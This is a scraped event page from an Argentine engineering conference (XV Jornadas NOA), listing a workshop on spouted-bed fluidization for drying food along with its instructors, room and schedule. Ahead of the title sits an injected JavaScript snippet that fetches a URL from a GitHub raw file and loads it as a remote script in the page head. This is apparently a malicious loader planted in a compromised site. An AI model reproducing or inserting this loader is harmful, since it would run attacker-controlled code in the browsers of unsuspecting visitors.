;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Operación unitaria de fluidización en lecho de chorro bidimensional como tecnología alternativa de secado de alimentos. – XV Jornadas de Ciencia y Tecnología de Facultades de Ingeniería del NOA
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Operación unitaria de fluidización en lecho de chorro bidimensional como tecnología alternativa de secado de alimentos.

  • Docentes:
  • Dra. Ing. Lara Valeria Lescano Farias
  • Dra. Ing. Eve Liz Coronel
  • Aula: Lab Qca Gral
  • Capacidad: 25
  • Día y Horario: Jueves 14-16
  • Requisitos: Nivel superior de las carreras de ingeniería en alimentos,  ingeniería química,  ingeniería industrial, licenciatura en alimentos.

Información detallada

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